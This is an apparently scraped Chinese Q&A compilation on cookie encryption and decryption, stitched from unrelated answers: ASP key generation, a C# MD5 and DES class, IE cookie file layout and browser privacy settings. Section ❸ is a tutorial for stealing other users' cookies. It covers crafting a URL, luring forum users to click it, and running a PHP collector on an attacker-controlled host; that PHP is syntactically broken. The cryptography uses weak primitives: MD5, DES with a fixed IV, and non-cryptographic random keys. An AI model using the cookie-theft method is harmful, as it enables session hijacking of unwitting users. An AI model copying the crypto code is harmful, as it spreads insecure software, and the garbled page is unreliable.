cookie加密解密
❶ asp cookie加密
它的基本原理是,需要有一個需要加密的明文和一個隨機生成的解密鑰匙文件。然後
使用這兩個文件組合起來生成密文。
(明文) 組合 (密鑰) = 加密後的密文
所以本文介紹的是生成密鑰的代碼。我們假設我們生成的密鑰為512位長的密鑰,
它已經足夠來加密一個文本字元了。代碼如下:
KeyGeN.asp文件
<%
'******************************
' KeyGeN.asp
'******************************
Const g_KeyLocation = "C:\key.txt"
Const g_KeyLen = 512
On Error Resume Next
Call WriteKeyToFile(KeyGeN(g_KeyLen),g_KeyLocation)
if Err <> 0 Then
Response.Write "ERROR GENERATING KEY." & "<P>"
Response.Write Err.Number & "<BR>"
Response.Write Err.Description & "<BR>"
Else
Response.Write "KEY SUCCESSFULLY GENERATED."
End If
Sub WriteKeyToFile(MyKeyString,strFileName)
Dim keyFile, fso
set fso = Server.CreateObject("scripting.FileSystemObject")
set keyFile = fso.CreateTextFile(strFileName, true)
keyFile.WriteLine(MyKeyString)
keyFile.Close
End Sub
Function KeyGeN(iKeyLength)
Dim k, iCount, strMyKey
lowerbound = 35
upperbound = 96
Randomize ' Initialize random-number generator.
for i = 1 to iKeyLength
s = 255
k = Int(((upperbound - lowerbound) + 1) * Rnd + lowerbound)
strMyKey = strMyKey & Chr(k) & ""
next
KeyGeN = strMyKey
End Function
%>
❷ asp.net cookie用戶名和密碼 加密 解密
using System;
using System.Collections.Generic;
using System.Text;
using System.Security.Cryptography;
using System.IO;
namespace clsModel
{
class clsModel
{
public static string UserMd5(string str)
{
string cl = str;
string pwd = "";
MD5 md5 = MD5.Create();//實例化一個md5對像
// 加密後是一個位元組類型的數組,這里要注意編碼UTF8/Unicode等的選擇
byte[] s = md5.ComputeHash(Encoding.UTF8.GetBytes(cl));
// 通過使用循環,將位元組類型的數組轉換為字元串,此字元串是常規字元格式化所得
for (int i = 0; i < s.Length; i++)
{
// 將得到的字元串使用十六進制類型格式。格式後的字元是小寫的字母,如果使用大寫(X)則格式後的字元是大寫字元
pwd = pwd + s[i].ToString("x").PadLeft(2, '0');
}
return pwd;
}
private static byte[] IV = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
public static String Encrypt(String Key, String str)
{
byte[] bKey = Encoding.UTF8.GetBytes(Key.Substring(0, 8));
byte[] bIV = IV;
byte[] bStr = Encoding.UTF8.GetBytes(str);
try
{
DESCryptoServiceProvider desc = new DESCryptoServiceProvider();
MemoryStream mStream = new MemoryStream();
CryptoStream cStream = new CryptoStream(mStream, desc.CreateEncryptor(bKey, bIV), CryptoStreamMode.Write);
cStream.Write(bStr, 0, bStr.Length);
cStream.FlushFinalBlock();
return Convert.ToBase64String(mStream.ToArray());
}
catch
{
return string.Empty;
}
}
public static String Decrypt(String Key, String DecryptStr)
{
try
{
byte[] bKey = Encoding.UTF8.GetBytes(Key.Substring(0, 8));
byte[] bIV = IV;
byte[] bStr = Convert.FromBase64String(DecryptStr);
DESCryptoServiceProvider desc = new DESCryptoServiceProvider();
MemoryStream mStream = new MemoryStream();
CryptoStream cStream = new CryptoStream(mStream, desc.CreateDecryptor(bKey, bIV), CryptoStreamMode.Write);
cStream.Write(bStr, 0, bStr.Length);
cStream.FlushFinalBlock();
return Encoding.UTF8.GetString(mStream.ToArray());
}
catch
{
return string.Empty;
}
}
}
}
完整的加密解密類...直接引用就可以,方法中的參數Key為密碼,可以自己指定...
Encrypt加密的方法
Decrypt解密的方法
❸ cookie文件的解密
第1行為 Cookie 名稱
第2行是 Cookie 的值
第3行是 Cookie 所屬站點的地址
第4行是個標記值(注:准確來說應該是表示該Cookie是否被加密)
第5行為超時時間的低位(Cardinal/DWORD)
第6行為超時時間的高位
第7行為創建時間的低位
第8行為創建時間的高位
第9行固定為 * ,表示一節的結束
需要注意的是這里使用的時間並非 Delphi 的 TDateTime,而是 FILETIME(D里為對應的TFileTime)
一個文件可能包含有多個節,按上面的格式循環即可
多數網頁編程語言都提供了對Cookie的支持。
如javascript、VBScript、Delphi、ASP、SQL、PHP、C#等。在這些面向對象的編程語言中,對Cookie的編程利用基本上是相似的,大體過程為:
先創建一個Cookie對象(Object),然後利用控制函數對Cookie進行賦值、讀取、寫入等操作。
那麼如何通過代碼來獲取其他用戶Cookie中的敏感信息?
下面進行簡單的介紹。
該方法主要有兩步,首先要定位你需要收集Cookie的網站,並對其進行分析,並構造URL;然後編制收集Cookie的PHP代碼,並將其放到你可以控制的網站上,當不知情者單擊了你構造的URL後可以執行該PHP代碼。下面我們看具體的實現過程。
分析並構造URL
首先打開我們要收集Cookie的網站,這里假設是登陸網站輸入用戶名「」(不含引號),對數據進行分析就是你能夠控制的某台主機上的一個腳本。需要注意的是「%2B」為符號「+」的URL編碼,因為「+」將被作為空格處理。該URL就可以在論壇中發布,誘使別人點擊了。
編制PHP腳本
該腳本的作用就是收集Cookie文件,具體內容如下:
$info = getenv("QUERY_STRING";
if ($info) {
$fp = fopen("info.txt","a";
fwrite($fp,$info."\n";
fclose($fp);
}
❹ 如何把cookie裡面的解碼出來
這個是有通過密匙加密的,密匙一般配置在components->request->cookieValidationKey,沒有密匙解密。。。就不在我們研究范圍了。
至於解密的過程你可以查看yii\web\Request下的getCookies方法,看他怎麼解密的。
❺ session cookie 怎麼實現加密
cookie 可以加密,但加密後的數據不能被 js 使用
如果提供 js 版的解密函數,那麼加密就沒有任何意義了
session 無需加密,因為他保存於伺服器端。
如果連你自己的伺服器的安全你都不能保證,乾脆就不要做web開發了
❻ cookie文件如何解密
Cookie中的內容大多數經過了加密處理,因此在我們看來只是一些毫無意義的字母數字組合,只有伺服器的CGI處理程序才知道它們真正的含義。通過一些軟體我們可以查看到更多的內容,使用Cookie Pal軟體查看到的Cookie信息,如圖2所示。它為我們提供了Server、Expires、Name、Value等選項的內容。其中,Server 是存儲Cookie的網站,Expires記錄了Cookie的時間和生命期,Name和value欄位則是具體的數據。
Cookie是當你瀏覽某網站時,網站存儲在你機器上的一個小文本文件,它記錄了你的用戶ID,密碼、瀏覽過的網頁、停留的時間等信息,當你再次來到該網站時,網站通過讀取Cookie,得知你的相關信息,就可以做出相應的動作,如在頁面顯示歡迎你的標語,或者讓你不用輸入ID、密碼就直接登錄等等。你可以在IE的「工具/Internet選項」的「常規」選項卡中,選擇「設置/查看文件」,查看所有保存到你電腦里的Cookie。這些文件通常是以user@domain格式命名的,user是你的本地用戶名,domain是所訪問的網站的域名。如果你使用NetsCape瀏覽器,則存放在「C:\PROGRAMFILES\NETSCAPE\USERS\」裡面,與IE不同的是,NETSCAPE是使用一個Cookie 文件記錄所有網站的Cookies。
為了保證上網安全我們需要對Cookie進行適當設置。打開「工具/Internet選項」中的「隱私」選項卡(注意該設置只在IE6.0中存在,其他版本IE可以在「工具/Internet選項」的「安全」標簽中單擊「自定義級別」按鈕,進行簡單調整),調整Cookie的安全級別。通常情況,可以將滑塊調整到「中高」或者「高」的位置。多數的論壇站點需要使用Cookie信息,如果你從來不去這些地方,可以將安全級調到「阻止所有 Cookies」。如果只是為了禁止個別網站的Cookie,可以單擊「編輯」按鈕,將要屏蔽的網站添加到列表中。在「高級」按鈕選項中,你可以對第一方 Cookie和第三方的Cookie進行設置,第一方Cookie是你正在瀏覽的網站的Cookie,第三方Cookie非正在瀏覽的網站發給你的 Cookie,通常要對第三方Cookie選擇「拒絕」,如圖1。你如果需要保存Cookie,可以使用IE的「導入導出」功能,打開「文件/導入導出」,按提示操作即可。